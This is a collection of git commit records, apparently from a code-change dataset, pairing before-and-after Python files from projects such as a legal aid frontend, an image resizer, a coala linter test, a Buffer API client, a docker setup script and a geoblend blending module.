config = settings.NYDUS_CONFIG['CONNECTIONS']['redis']
key = unicode(config)
cluster = connection_cache.get(key)
if not cluster:
cluster = create_cluster(config)
connection_cache[key] = cluster
return cluster
| bsd-3-clause | Python |
9a8d3fb2c65de3078eea987378c26360363217d2 | use django urlencode to fix string conversion of postcode in addressfinder | ministryofjustice/cla_frontend,ministryofjustice/cla_frontend,ministryofjustice/cla_frontend,ministryofjustice/cla_frontend | cla_frontend/apps/legalaid/addressfinder.py | cla_frontend/apps/legalaid/addressfinder.py | from django.conf import settings
from django.utils.http import urlencode
import requests
def query(path, **kwargs):
return requests.get(
"{host}/{path}?{args}".format(
host=settings.ADDRESSFINDER_API_HOST,
path=path,
args=urlencode(kwargs)),
headers={
'Authorization': 'Token %s' % settings.ADDRESSFINDER_API_TOKEN},
timeout=(2.0, 5.0))
def lookup_postcode(postcode):
return query('addresses/', postcode=postcode)
| import urllib
from django.conf import settings
import requests
def query(path, **kwargs):
return requests.get(
"{host}/{path}?{args}".format(
host=settings.ADDRESSFINDER_API_HOST,
path=path,
args=urllib.urlencode(kwargs)),
headers={
'Authorization': 'Token %s' % settings.ADDRESSFINDER_API_TOKEN},
timeout=(2.0, 5.0))
def lookup_postcode(postcode):
return query('addresses/', postcode=postcode)
| mit | Python |
a105323c9f0a3f1868f31cd6e65008b25b46c9e4 | Move the matplotlib.pyplot code to its own function. | eliteraspberries/fftresize | fftresize/imutils.py | fftresize/imutils.py | #!/usr/bin/env python2
'''Read and write image files as NumPy arrays
'''
from matplotlib import pyplot
from numpy import amax, amin, around, asarray, zeros as _zeros
from numpy import float32, uint8
from os.path import exists, splitext
from PIL import Image
from random import randint
from sys import float_info as _float_info
DEFAULT_DTYPE = float32
def channels(img):
'''The number of 2D channels in a 3D array.
'''
_channels = lambda x, y, z=1: z
return _channels(*img.shape)
def _normalize(array):
'''Normalize an array to the interval [0,1].
'''
min = amin(array)
max = amax(array)
array -= min
array /= max - min
eps = 10.0 * _float_info.epsilon
negs = array < 0.0 + eps
array[negs] = 0.0
bigs = array > 1.0 - eps
array[bigs] = 1.0
return
def read(filename, dtype=None):
'''Return an array representing an image file.
'''
if dtype is None:
dtype = DEFAULT_DTYPE
img = Image.open(filename)
arr = asarray(img, dtype=dtype)
return arr
def _pyplot_save(img, filename):
if channels(img) == 1:
cmap = pyplot.cm.gray
else:
cmap = None
pyplot.imsave(filename, img, cmap=cmap)
return
def save(img, filename):
'''Save an array as a unique image file and return its path.
'''
while True:
newfile = splitext(filename)[0] + '-'
newfile = newfile + str(randint(0, 1000)) + '.png'
if not exists(newfile):
break
_normalize(img)
uint8img = _zeros(img.shape, dtype=uint8)
around(img * 255, out=uint8img)
_pyplot_save(uint8img, newfile)
return newfile
if __name__ == '__main__':
pass
| #!/usr/bin/env python2
'''Read and write image files as NumPy arrays
'''
from matplotlib import pyplot
from numpy import amax, amin, around, asarray, zeros as _zeros
from numpy import float32, uint8
from os.path import exists, splitext
from PIL import Image
from random import randint
from sys import float_info as _float_info
DEFAULT_DTYPE = float32
def channels(img):
'''The number of 2D channels in a 3D array.
'''
_channels = lambda x, y, z=1: z
return _channels(*img.shape)
def _normalize(array):
'''Normalize an array to the interval [0,1].
'''
min = amin(array)
max = amax(array)
array -= min
array /= max - min
eps = 10.0 * _float_info.epsilon
negs = array < 0.0 + eps
array[negs] = 0.0
bigs = array > 1.0 - eps
array[bigs] = 1.0
return
def read(filename, dtype=None):
'''Return an array representing an image file.
'''
if dtype is None:
dtype = DEFAULT_DTYPE
img = Image.open(filename)
arr = asarray(img, dtype=dtype)
return arr
def save(img, filename):
'''Save an array as a unique image file and return its path.
'''
while True:
newfile = splitext(filename)[0] + '-'
newfile = newfile + str(randint(0, 1000)) + '.png'
if not exists(newfile):
break
_normalize(img)
uint8img = _zeros(img.shape, dtype=uint8)
around(img * 255, out=uint8img)
if channels(img) == 1:
cmap = pyplot.cm.gray
else:
cmap = None
pyplot.imsave(newfile, uint8img, cmap=cmap)
return newfile
if __name__ == '__main__':
pass
| isc | Python |
d311f8069e8a4bf9a4d45c356955622059d75f10 | fix importing dependencies | levabd/stack-updater | stackupdater/src/lib/wrappers/process.py | stackupdater/src/lib/wrappers/process.py | # coding=utf-8
from .. import logger
class ProcessWrapper(object):
"""Wraps the subprocess popen method and provides logging."""
def __init__(self):
pass
@staticmethod
def call(*popenargs, **kwargs):
"""Run command with arguments. Wait for command to complete. Sends
output to logging module. The arguments are the same as for the Popen
constructor."""
from subprocess import Popen, PIPE
kwargs['stdout'] = PIPE
kwargs['stderr'] = PIPE
p = Popen(*popenargs, **kwargs)
stdout, stderr = p.communicate()
if stdout:
for line in stdout.strip().split("\n"):
logger.info(line)
if stderr:
for line in stderr.strip().split("\n"):
logger.error(line)
return p.returncode | # coding=utf-8
from lib import logger
class ProcessWrapper(object):
"""Wraps the subprocess popen method and provides logging."""
def __init__(self):
pass
@staticmethod
def call(*popenargs, **kwargs):
"""Run command with arguments. Wait for command to complete. Sends
output to logging module. The arguments are the same as for the Popen
constructor."""
from subprocess import Popen, PIPE
kwargs['stdout'] = PIPE
kwargs['stderr'] = PIPE
p = Popen(*popenargs, **kwargs)
stdout, stderr = p.communicate()
if stdout:
for line in stdout.strip().split("\n"):
logger.info(line)
if stderr:
for line in stderr.strip().split("\n"):
logger.error(line)
return p.returncode | mit | Python |
96243824bbccecd2bfe3b19e09dd7e6daf16621d | Remove our own sizing | quozl/sugar-toolkit-gtk3,samdroid-apps/sugar-toolkit-gtk3,sugarlabs/sugar-toolkit-gtk3,puneetgkaur/backup_sugar_sugartoolkit,manuq/sugar-toolkit-gtk3,godiard/sugar-toolkit-gtk3,manuq/sugar-toolkit-gtk3,quozl/sugar-toolkit-gtk3,tchx84/sugar-toolkit-gtk3,Daksh/sugar-toolkit-gtk3,quozl/sugar-toolkit-gtk3,tchx84/debian-pkg-sugar-toolkit,tchx84/sugar-toolkit-gtk3,ceibal-tatu/sugar-toolkit-gtk3,godiard/sugar-toolkit-gtk3,puneetgkaur/backup_sugar_sugartoolkit,ceibal-tatu/sugar-toolkit-gtk3,tchx84/debian-pkg-sugar-toolkit-gtk3,i5o/sugar-toolkit-gtk3,tchx84/debian-pkg-sugar-toolkit-gtk3,quozl/sugar-toolkit-gtk3,gusDuarte/sugar-toolkit-gtk3,samdroid-apps/sugar-toolkit-gtk3,Daksh/sugar-toolkit-gtk3,sugarlabs/sugar-toolkit,sugarlabs/sugar-toolkit,tchx84/debian-pkg-sugar-toolkit,i5o/sugar-toolkit-gtk3,ceibal-tatu/sugar-toolkit,godiard/sugar-toolkit-gtk3,tchx84/debian-pkg-sugar-toolkit-gtk3,ceibal-tatu/sugar-toolkit-gtk3,ceibal-tatu/sugar-toolkit,samdroid-apps/sugar-toolkit-gtk3,sugarlabs/sugar-toolkit,gusDuarte/sugar-toolkit-gtk3,sugarlabs/sugar-toolkit,sugarlabs/sugar-toolkit-gtk3,i5o/sugar-toolkit-gtk3,manuq/sugar-toolkit-gtk3,puneetgkaur/sugar-toolkit-gtk3,tchx84/debian-pkg-sugar-toolkit,samdroid-apps/sugar-toolkit-gtk3,gusDuarte/sugar-toolkit-gtk3,puneetgkaur/sugar-toolkit-gtk3,sugarlabs/sugar-toolkit-gtk3,puneetgkaur/sugar-toolkit-gtk3,puneetgkaur/backup_sugar_sugartoolkit,ceibal-tatu/sugar-toolkit,tchx84/sugar-toolkit-gtk3,gusDuarte/sugar-toolkit-gtk3,i5o/sugar-toolkit-gtk3,Daksh/sugar-toolkit-gtk3 | sugar/graphics/filechooser.py | sugar/graphics/filechooser.py | import gtk
from sugar.graphics import units
class FileChooserDialog(gtk.FileChooserDialog):
def __init__(self, title=None, parent=None,
action=gtk.FILE_CHOOSER_ACTION_OPEN, buttons=None):
gtk.FileChooserDialog.__init__(self, title, parent, action, buttons)
| import gtk
from sugar.graphics import units
class FileChooserDialog(gtk.FileChooserDialog):
def __init__(self, title=None, parent=None,
action=gtk.FILE_CHOOSER_ACTION_OPEN, buttons=None):
gtk.FileChooserDialog.__init__(self, title, parent, action, buttons)
self.set_default_size(units.points_to_pixels(7 * 40),
units.points_to_pixels(7 * 30))
| lgpl-2.1 | Python |
c2d6c4876355053f1219b1f9829114d7f9ddbe18 | Test ignoring defaults | Asnelchristian/coala,SambitAcharya/coala,djkonro/coala,Shade5/coala,FeodorFitsner/coala,Tanmay28/coala,stevemontana1980/coala,FeodorFitsner/coala,sophiavanvalkenburg/coala,NalinG/coala,shreyans800755/coala,SambitAcharya/coala,scottbelden/coala,saurabhiiit/coala,andreimacavei/coala,d6e/coala,aptrishu/coala,SanketDG/coala,MariosPanag/coala,yland/coala,RJ722/coala,incorrectusername/coala,Tanmay28/coala,nemaniarjun/coala,sils1297/coala,abhiroyg/coala,refeed/coala,stevemontana1980/coala,shreyans800755/coala,netman92/coala,sagark123/coala,andreimacavei/coala,aptrishu/coala,Tanmay28/coala,svsn2117/coala,NalinG/coala,SambitAcharya/coala,karansingh1559/coala,CruiseDevice/coala,impmihai/coala,Asnelchristian/coala,NalinG/coala,abhiroyg/coala,kartikeys98/coala,NiklasMM/coala,meetmangukiya/coala,coala/coala,meetmangukiya/coala,FeodorFitsner/coala,sagark123/coala,andreimacavei/coala,MattAllmendinger/coala,Asalle/coala,kartikeys98/coala,rimacone/testing2,swatilodha/coala,d6e/coala,Uran198/coala,ayushin78/coala,djkonro/coala,lonewolf07/coala,dagdaggo/coala,coala-analyzer/coala,AdeshAtole/coala,mr-karan/coala,damngamerz/coala,swatilodha/coala,nemaniarjun/coala,rresol/coala,AbdealiJK/coala,kartikeys98/coala,tushar-rishav/coala,arafsheikh/coala,arjunsinghy96/coala,sophiavanvalkenburg/coala,Shade5/coala,SambitAcharya/coala,scottbelden/coala,svsn2117/coala,sudheesh001/coala,NiklasMM/coala,rresol/coala,sophiavanvalkenburg/coala,scriptnull/coala,arush0311/coala,arafsheikh/coala,incorrectusername/coala,ManjiriBirajdar/coala,NiklasMM/coala,yashtrivedi96/coala,arush0311/coala,scriptnull/coala,yashtrivedi96/coala,Tanmay28/coala,AdeshAtole/coala,coala-analyzer/coala,JohnS-01/coala,netman92/coala,dagdaggo/coala,Uran198/coala,Nosferatul/coala,Asalle/coala,tltuan/coala,arjunsinghy96/coala,arush0311/coala,swatilodha/coala,sils1297/coala,tltuan/coala,yland/coala,refeed/coala,impmihai/coala,coala-analyzer/coala,svsn2117/coala,saurabhiiit/coala,AbdealiJK/coala,Balaji2198/coala,ManjiriBirajdar/coala,RJ722/coala,arjunsinghy96/coala,MattAllmendinger/coala,arafsheikh/coala,ayushin78/coala,lonewolf07/coala,aptrishu/coala,jayvdb/coala,dagdaggo/coala,sagark123/coala,SambitAcharya/coala,Balaji2198/coala,yland/coala,yashtrivedi96/coala,RJ722/coala,SanketDG/coala,refeed/coala,mr-karan/coala,NalinG/coala,scriptnull/coala,ManjiriBirajdar/coala,Nosferatul/coala,sudheesh001/coala,rimacone/testing2,Tanmay28/coala,JohnS-01/coala,tltuan/coala,abhiroyg/coala,jayvdb/coala,yashLadha/coala,incorrectusername/coala,tushar-rishav/coala,AbdealiJK/coala,meetmangukiya/coala,lonewolf07/coala,NalinG/coala,jayvdb/coala,SambitAcharya/coala,coala/coala,sils1297/coala,SambitAcharya/coala,MattAllmendinger/coala,vinc456/coala,coala/coala,MariosPanag/coala,scottbelden/coala,karansingh1559/coala,Uran198/coala,AdeshAtole/coala,CruiseDevice/coala,karansingh1559/coala,Asnelchristian/coala,shreyans800755/coala,yashLadha/coala,yashLadha/coala,djkonro/coala,tushar-rishav/coala,rresol/coala,Shade5/coala,NalinG/coala,scriptnull/coala,CruiseDevice/coala,scriptnull/coala,JohnS-01/coala,vinc456/coala,nemaniarjun/coala,Tanmay28/coala,saurabhiiit/coala,Nosferatul/coala,sudheesh001/coala,scriptnull/coala,Tanmay28/coala,Tanmay28/coala,rimacone/testing2,damngamerz/coala,d6e/coala,impmihai/coala,vinc456/coala,stevemontana1980/coala,MariosPanag/coala,netman92/coala,mr-karan/coala,SanketDG/coala,Balaji2198/coala,scriptnull/coala,Asalle/coala,ayushin78/coala,damngamerz/coala,NalinG/coala | coalib/tests/settings/SettingsTest.py | coalib/tests/settings/SettingsTest.py | """
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import unittest
import sys
sys.path.insert(0, ".")
from coalib.settings.Settings import Settings, Setting
from coalib.misc.StringConstants import StringConstants
class SettingsTestCase(unittest.TestCase):
def test_construction(self):
uut = Settings(StringConstants.COMPLEX_TEST_STRING, None)
uut = Settings(StringConstants.COMPLEX_TEST_STRING, uut)
self.assertRaises(TypeError, Settings, "irrelevant", 5)
self.assertRaises(ValueError, uut.__init__, "name", uut)
def test_append(self):
uut = Settings(StringConstants.COMPLEX_TEST_STRING, None)
self.assertRaises(TypeError, uut.append, 5)
uut.append(Setting(5, 5, 5))
def test_iter(self):
defaults = Settings("default", None)
uut = Settings("name", defaults)
uut.append(Setting(5,5,5))
uut.append(Setting("TEsT",4,5))
defaults.append(Setting("tEsT", 1,3))
defaults.append(Setting(" great ", 3, 8))
defaults.append(Setting(" great ", 3, 8), custom_key="custom")
self.assertEqual(list(uut), ["5", "test", "great", "custom"])
for index in uut:
t = uut[index]
self.assertNotEqual(t, None)
self.assertEqual(True, "teST" in defaults)
self.assertEqual(True, " GREAT" in defaults)
self.assertEqual(False, " GrEAT !" in defaults)
self.assertEqual(False, "" in defaults)
self.assertEqual(int(uut["teSt "]), 4)
self.assertEqual(int(uut["GREAT "]), 3)
self.assertRaises(IndexError, uut.__getitem__, "doesnotexist")
self.assertRaises(IndexError, uut.__getitem__, "great", True)
self.assertRaises(IndexError, uut.__getitem__, " ")
if __name__ == '__main__':
unittest.main(verbosity=2)
| """
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import unittest
import sys
sys.path.insert(0, ".")
from coalib.settings.Settings import Settings, Setting
from coalib.misc.StringConstants import StringConstants
class SettingsTestCase(unittest.TestCase):
def test_construction(self):
uut = Settings(StringConstants.COMPLEX_TEST_STRING, None)
uut = Settings(StringConstants.COMPLEX_TEST_STRING, uut)
self.assertRaises(TypeError, Settings, "irrelevant", 5)
self.assertRaises(ValueError, uut.__init__, "name", uut)
def test_append(self):
uut = Settings(StringConstants.COMPLEX_TEST_STRING, None)
self.assertRaises(TypeError, uut.append, 5)
uut.append(Setting(5, 5, 5))
def test_iter(self):
defaults = Settings("default", None)
uut = Settings("name", defaults)
uut.append(Setting(5,5,5))
uut.append(Setting("TEsT",4,5))
defaults.append(Setting("tEsT", 1,3))
defaults.append(Setting(" great ", 3, 8))
defaults.append(Setting(" great ", 3, 8), custom_key="custom")
self.assertEqual(list(uut), ["5", "test", "great", "custom"])
for index in uut:
t = uut[index]
self.assertNotEqual(t, None)
self.assertEqual(True, "teST" in defaults)
self.assertEqual(True, " GREAT" in defaults)
self.assertEqual(False, " GrEAT !" in defaults)
self.assertEqual(False, "" in defaults)
self.assertEqual(int(uut["teSt "]), 4)
self.assertEqual(int(uut["GREAT "]), 3)
self.assertRaises(IndexError, uut.__getitem__, "doesnotexist")
self.assertRaises(IndexError, uut.__getitem__, " ")
if __name__ == '__main__':
unittest.main(verbosity=2)
| agpl-3.0 | Python |
00c01e9f92c0f527fa0e1ea324ee65890d1ae4a8 | comment :grin: | CloudbrainLabs/htm-challenge,lambdaloop/htm-challenge,CloudbrainLabs/htm-challenge,CloudbrainLabs/htm-challenge | brainsquared/test/test_eeg_encoder.py | brainsquared/test/test_eeg_encoder.py | import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from brainsquared.encoder.eeg_encoder import EEGEncoder
CHUNK = 128
SLIDING_WINDOW = 64
RATE = 250
MI_DATA = "data/motor_data.csv"
def visualizeSDRs(sdrs):
sdrsToVisualize = []
for sdr in sdrs:
sdrsToVisualize.append([255 if x else 0 for x in sdr])
imageArray = np.rot90(np.array(sdrsToVisualize))
plt.imshow(imageArray, cmap='Greys', interpolation='nearest')
plt.show()
def recordAndEncode(encoder):
window = np.blackman(CHUNK)
sdrs = []
print "---recording---"
d = pd.read_csv(MI_DATA)
data = np.array(d['channel_0'])
data = data[np.logical_not(np.isnan(data))]
for i in xrange(500, len(data)-CHUNK, SLIDING_WINDOW):
chunk = data[i:i+CHUNK] * window
sdr = encoder.encode(chunk)
sdrs.append(sdr)
print "---done---"
return sdrs
if __name__ == "__main__":
n = 300
w = 31
minval = 0
maxval = 0.005
# Mu wave frequency range associated with activity in the motor cortex.
# That's what we want to detect.
minFreq = 9
maxFreq = 11
soundEncoder = EEGEncoder(n, w, RATE, CHUNK, minval, maxval, minFreq, maxFreq)
sdrs = recordAndEncode(soundEncoder)
visualizeSDRs(sdrs)
| import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from brainsquared.encoder.eeg_encoder import EEGEncoder
CHUNK = 128
SLIDING_WINDOW = 64
RATE = 250
MI_DATA = "data/motor_data.csv"
def visualizeSDRs(sdrs):
sdrsToVisualize = []
for sdr in sdrs:
sdrsToVisualize.append([255 if x else 0 for x in sdr])
imageArray = np.rot90(np.array(sdrsToVisualize))
plt.imshow(imageArray, cmap='Greys', interpolation='nearest')
plt.show()
def recordAndEncode(encoder):
window = np.blackman(CHUNK)
sdrs = []
print "---recording---"
d = pd.read_csv(MI_DATA)
data = np.array(d['channel_0'])
data = data[np.logical_not(np.isnan(data))]
for i in xrange(500, len(data)-CHUNK, SLIDING_WINDOW):
chunk = data[i:i+CHUNK] * window
sdr = encoder.encode(chunk)
sdrs.append(sdr)
print "---done---"
return sdrs
if __name__ == "__main__":
n = 300
w = 31
minFreq = 9
maxFreq = 11
minval = 0
maxval = 0.005
soundEncoder = EEGEncoder(n, w, RATE, CHUNK, minval, maxval, minFreq, maxFreq)
sdrs = recordAndEncode(soundEncoder)
visualizeSDRs(sdrs)
| agpl-3.0 | Python |
1f2deb95ba543bf05dd78f1df2e9ee6d17a2c4c3 | Test profiles manager filterting method | vtemian/buffpy,bufferapp/buffer-python | buffer/tests/test_profiles_manager.py | buffer/tests/test_profiles_manager.py | import json
from nose.tools import eq_, raises
from mock import MagicMock, patch
from buffer.managers.profiles import Profiles
from buffer.models.profile import Profile, PATHS
mocked_response = {
'name': 'me',
'service': 'twiter',
'id': 1
}
def test_profiles_manager_all_method():
'''
Test basic profiles retrieving
'''
mocked_api = MagicMock()
mocked_api.get.return_value = [{'a':'b'}]
with patch('buffer.managers.profiles.Profile') as mocked_profile:
mocked_profile.return_value = 1
profiles = Profiles(api=mocked_api).all()
eq_(profiles, [1])
mocked_api.get.assert_called_once_with(url=PATHS['GET_PROFILES'])
mocked_profile.assert_called_once_with(mocked_api, {'a': 'b'})
def test_profiles_manager_filter_method():
'''
Test basic profiles filtering based on some minimal criteria
'''
mocked_api = MagicMock()
profiles = Profiles(mocked_api, [{'a':'b'}, {'a': 'c'}])
eq_(profiles.filter(a='b'), [{'a': 'b'}])
def test_profiles_manager_filter_method_empty():
'''
Test basic profiles filtering when the manager is empty
'''
mocked_api = MagicMock()
mocked_api.get.return_value = [{'a':'b'}, {'a': 'c'}]
profiles = Profiles(api=mocked_api)
eq_(profiles.filter(a='b'), [Profile(mocked_api, {'a': 'b'})])
| import json
from nose.tools import eq_, raises
from mock import MagicMock, patch
from buffer.managers.profiles import Profiles
from buffer.models.profile import PATHS
mocked_response = {
'name': 'me',
'service': 'twiter',
'id': 1
}
def test_profiles_manager_all_method():
'''
Test basic profiles retrieving
'''
mocked_api = MagicMock()
mocked_api.get.return_value = [{'a':'b'}]
with patch('buffer.managers.profiles.Profile') as mocked_profile:
mocked_profile.return_value = 1
profiles = Profiles(api=mocked_api).all()
eq_(profiles, [1])
mocked_api.get.assert_called_once_with(url=PATHS['GET_PROFILES'])
mocked_profile.assert_called_once_with(mocked_api, {'a': 'b'})
| mit | Python |
7469a750a7303b346a91376ae16dc42b69208c18 | Support for X-Ten machine IDs | SciLifeLab/TACA,SciLifeLab/TACA,kate-v-stepanova/TACA,senthil10/TACA,b97pla/TACA,guillermo-carrasco/TACA,kate-v-stepanova/TACA,SciLifeLab/TACA,senthil10/TACA,vezzi/TACA,b97pla/TACA,guillermo-carrasco/TACA,vezzi/TACA | pm/utils/filesystem.py | pm/utils/filesystem.py | """ Filesystem utilities
"""
import contextlib
import os
RUN_RE = '\d{6}_[a-zA-Z\d\-]+_\d{4}_[AB][A-Z\d]{9}'
@contextlib.contextmanager
def chdir(new_dir):
"""Context manager to temporarily change to a new directory.
"""
cur_dir = os.getcwd()
# This is weird behavior. I'm removing and and we'll see if anything breaks.
#safe_makedir(new_dir)
os.chdir(new_dir)
try:
yield
finally:
os.chdir(cur_dir)
| """ Filesystem utilities
"""
import contextlib
import os
RUN_RE = '\d{6}_[a-zA-Z\d]+_\d{4}_[AB][A-Z\d]{9}'
@contextlib.contextmanager
def chdir(new_dir):
"""Context manager to temporarily change to a new directory.
"""
cur_dir = os.getcwd()
# This is weird behavior. I'm removing and and we'll see if anything breaks.
#safe_makedir(new_dir)
os.chdir(new_dir)
try:
yield
finally:
os.chdir(cur_dir)
| mit | Python |
2acaea560eaaea88a97c5b450e18ea018a3b74ad | Refactor for ease of unit testing. | geekofalltrades/quora-coding-challenges | typeahead_search/search.py | typeahead_search/search.py | import sys
from warnings import warn
class TypeAheadSearch(object):
"""Class encapsulating the action of the typeahead search."""
def __init__(self):
# Keep a record of all commands processed.
self.commands = []
def main(self):
"""Main search loop."""
# Get the number of expected commands.
self.num_commands = self.get_num_commands(
sys.stdin.readline().strip()
)
# Fetch each command from the input.
for i in range(self.num_commands):
command = sys.stdin.readline().strip()
# If no input is available, raise a warning.
if not command:
warn(
"Ecountered unexpected EOF. (Did you provide fewer"
" than {} commands?)".format(self.num_commands),
InputWarning
)
self.parse_command(command)
# Check whether any input remains, and warn, if so.
command = sys.stdin.readline().strip()
if command:
warn(
"Encountered unexpected input. (Did you provide more"
" than {} commands?) Lines from \"{}\" will not be"
" evaluated.".format(self.num_commands, command),
InputWarning
)
def get_num_commands(self, command):
"""Validate first line of input and extract expected number of
commands."""
try:
num_commands = int(command)
except ValueError:
raise TypeError(
"First line of input must be an integer."
)
if num_commands <= 0 or num_commands > 20:
raise ValueError(
"First line of input must be between 1 and 20, inclusive."
)
return num_commands
def parse_command(self, command):
"""Read, validate, and execute a command from stdin."""
# Store this command in the list of commands we have attempted
# to execute.
self.commands.append(command)
# Begin parsing this command.
class InputWarning(UserWarning):
"""Warning raised when input is longer or shorter than expected."""
if __name__ == '__main__':
search = TypeAheadSearch()
search.main()
| import sys
from warnings import warn
class TypeAheadSearch(object):
"""Class encapsulating the action of the typeahead search."""
def __init__(self):
# Keep a record of all commands processed.
self.commands = []
def main(self):
"""Main search loop."""
# Get the number of expected commands.
self.num_commands = self.get_num_commands()
# Fetch each command from the input.
for i in range(self.num_commands):
try:
self.parse_command()
except InputWarning as e:
# warn with the InputWarning and terminate this loop.
warn(e.message, e.__class__, stacklevel=2)
break
# Check whether any input remains, and warn, if so.
command = sys.stdin.readline().strip()
if command:
warn(
"Encountered unexpected input. (Did you provide more"
" than {} commands?) Lines from \"{}\" will not be"
" evaluated.".format(self.num_commands, command),
InputWarning
)
def get_num_commands(self):
"""Read the number of expected commands from stdin."""
try:
num_commands = int(sys.stdin.readline().strip())
except ValueError:
raise TypeError(
"First line of input must be an integer."
)
if num_commands <= 0 or num_commands > 20:
raise ValueError(
"First line of input must be between 1 and 20, inclusive."
)
def parse_command(self):
"""Read, validate, and execute a command from stdin."""
command = sys.stdin.readline().strip()
# If no input is available, raise a warning.
if not command:
raise InputWarning(
"Ecountered unexpected EOF. (Did you provide fewer"
" than {} commands?)".format(self.num_commands)
)
# Otherwise, store this command in the list of commands we have
# attempted to execute.
self.commands.append(command)
# Begin parsing this command.
class InputWarning(UserWarning):
"""Warning raised when input is longer or shorter than expected."""
if __name__ == '__main__':
search = TypeAheadSearch()
search.main()
| mit | Python |
8d3931fd5effabf9c5d56cb03ae15630ae984963 | Create simple CLI for the `places` function | FlowFX/postalcodes_mexico | postalcodes_mexico/cli.py | postalcodes_mexico/cli.py | # -*- coding: utf-8 -*-
"""Console script for postalcodes_mexico."""
import sys
import click
from postalcodes_mexico import postalcodes_mexico
@click.command()
@click.argument('postalcode', type=str)
def main(postalcode):
"""Console script for postalcodes_mexico."""
places = postalcodes_mexico.places(postalcode)
click.echo(places)
return 0
if __name__ == "__main__":
sys.exit(main()) # pragma: no cover
| # -*- coding: utf-8 -*-
"""Console script for postalcodes_mexico."""
import sys
import click
@click.command()
def main(args=None):
"""Console script for postalcodes_mexico."""
click.echo("Replace this message by putting your code into "
"postalcodes_mexico.cli.main")
click.echo("See click documentation at http://click.pocoo.org/")
return 0
if __name__ == "__main__":
sys.exit(main()) # pragma: no cover
| mit | Python |
5ff8a884961555deaee314f915be9092c041bd4c | Bump version: now compatible with python 2.7 and 3 | SciLifeLab/taca-ngi-pipeline | taca_ngi_pipeline/__init__.py | taca_ngi_pipeline/__init__.py | """ Main taca_ngi_pipeline module
"""
__version__ = '0.9.0'
| """ Main taca_ngi_pipeline module
"""
__version__ = '0.8.3'
| mit | Python |
4ad2b46fc06c71fb77b751b3cec5d4ac2d915ff7 | Complete docker compose with ln | hatchery/Genepool2,hatchery/genepool | genes/docker/main.py | genes/docker/main.py | from genes.apt import commands as apt
from genes.brew import commands as brew
from genes.curl.commands import download
from genes.debian.traits import is_debian, get_codename
from genes.gnu_coreutils.commands import ln
from genes.lib.traits import if_any_funcs
from genes.linux.traits import get_distro
from genes.mac.traits import is_osx
from genes.ubuntu.traits import is_ubuntu
@if_any_funcs(is_ubuntu, is_debian)
def install_compose():
compose_version = "1.5.2"
def config_directory():
return DirectoryConfig(
path='/opt/docker-compose',
mode='755',
group='root',
user='root',
)
# FIXME: Need to find a way to handle errors here
directory.main(config_directory)
download(
"https://github.com/docker/compose/releases/download/" + compose_version + "/docker-compose-Linux-x86_64",
"/opt/docker-compose/docker-compose-" + compose_version
)
# FIXME: handle file exists
ln("-s", "/usr/local/bin/docker-compose", "/opt/docker-compose/docker-compose-" + compose_version)
@if_any_funcs(is_ubuntu, is_debian)
def install_machine():
pass
def main():
if is_debian() or is_ubuntu():
repo = get_distro().lower() + '-' + \
get_codename().lower()
apt.recv_keys('58118E89F3A912897C070ADBF76221572C52609D')
apt.add_repo('deb', 'https://apt.dockerproject.org/repo', repo, 'main')
apt.update()
apt.install('docker-engine')
install_compose()
install_machine()
elif is_osx():
brew.update()
brew.cask_install('dockertoolbox')
# elif is_alpine()
# elif is_arch()
# pacman.update()
# pacman.install('docker')
# # start docker service
# # add compose, machine
else:
# FIXME: print failure, handle osx/windows
pass
| from genes.apt import commands as apt
from genes.brew import commands as brew
from genes.curl.commands import download
from genes.debian.traits import is_debian, get_codename
from genes.lib.traits import if_any_funcs
from genes.linux.traits import get_distro
from genes.mac.traits import is_osx
from genes.ubuntu.traits import is_ubuntu
@if_any_funcs(is_ubuntu, is_debian)
def install_compose():
compose_version = "1.5.2"
def config_directory():
return DirectoryConfig(
path='/opt/docker-compose',
mode='755',
group='root',
user='root',
)
# FIXME: Need to find a way to handle errors here
directory.main(config_directory)
download(
"https://github.com/docker/compose/releases/download/" + compose_version + "/docker-compose-Linux-x86_64",
"/opt/docker-compose/docker-compose
)
@if_any_funcs(is_ubuntu, is_debian)
def install_machine():
pass
def main():
if is_debian() or is_ubuntu():
repo = get_distro().lower() + '-' + \
get_codename().lower()
apt.recv_keys('58118E89F3A912897C070ADBF76221572C52609D')
apt.add_repo('deb', 'https://apt.dockerproject.org/repo', repo, 'main')
apt.update()
apt.install('docker-engine')
install_compose()
install_machine()
elif is_osx():
brew.update()
brew.cask_install('dockertoolbox')
# elif is_alpine()
# elif is_arch()
# pacman.update()
# pacman.install('docker')
# # start docker service
# # add compose, machine
else:
# FIXME: print failure, handle osx/windows
pass
| mit | Python |
062d39cdb3922740586c2af191dc12de2e842a3c | make gradient multiplier a kwarg | kapadia/geoblend | geoblend/__init__.py | geoblend/__init__.py |
import numpy as np
from geoblend.vector import create_vector
def blend(source, reference, mask, solver, gradient_multiplier=1.0):
"""
Run a Poisson blend between two arrays.
:param source:
ndarray representing the source image
:param reference:
ndarray representing the reference image
:param mask:
ndarray representing the mask
:param solver:
A precomputed multilevel solver.
"""
indices = np.nonzero(mask)
vector = create_vector(source.astype(np.float64), reference.astype(np.float64), mask, multiplier=gradient_multiplier)
x0 = source[indices].astype('float64')
pixels = np.round(solver.solve(b=vector, x0=x0, tol=1e-03, accel='cg'))
# TODO: Add dtype min/max parameter
arr = np.zeros_like(source)
arr[indices] = np.clip(pixels, 0, 4095)
return arr |
import numpy as np
from geoblend.vector import create_vector
def blend(source, reference, mask, solver, gradient_multiplier):
"""
Run a Poisson blend between two arrays.
:param source:
ndarray representing the source image
:param reference:
ndarray representing the reference image
:param mask:
ndarray representing the mask
:param solver:
A precomputed multilevel solver.
"""
indices = np.nonzero(mask)
